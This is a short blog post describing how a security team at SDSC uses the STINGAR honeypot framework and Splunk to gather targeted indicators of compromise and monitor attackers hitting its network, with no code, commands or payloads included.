I’m working on revamping the cyber threat intelligence program at SDSC, adding targeted IOCs, not just additional free feeds. I’ve also been working with STINGAR, a honeypot framework supported by Duke University. STINGAR is based on the open-source Community Honey Network, which takes steps to automate honeypot deployment and management. It’s also a central repo to pull down additional IOCs and contribute your own.
Focusing on IOCs generated by honeypots deployed within SDSC’s name & IP space allows us to quickly realize value from our data. We can take action on or continue monitor the adversaries directly attacking our network. Honeypots are a great tool to realize attacker techniques and patterns, as well as provide learning opportunities for malware analysis and attack vector research. Ingesting all of this data is great, but having a way to interact with it is key.
Using a SIEM-like tool, (in our case Splunk) we’re able to pull out additional info from our logs to take action. Most IOC lists are generated from source IPs (botnets) scanning the internet. With a honeypot and SIEM, we can pull out additional IOCs like username/password combos, commands executed, post exploit urls, domains and malicious executables. With proper monitoring in place, we can setup alerts looking for outbound communication to any of these IOCs. With authentication and OS command logs, we can look for similar attempts against internal systems as well as compare file strings and hashes quickly across the entire environment.
As more sessions and data is generated, it becomes easier to pick out anomalies and determine human vs. botnet interactions. These behaviors are crucial in determining the effectiveness of our honeypot. Levels of customization vary per honeypot, but for human interaction, it’s important to disguise your decoy as something familiar and enticing.
I’ll post more about my honeynet and Splunk setup as time goes on. I’ll include programs, tools, configurations and a video tutorial. Thanks for reading, and until next time!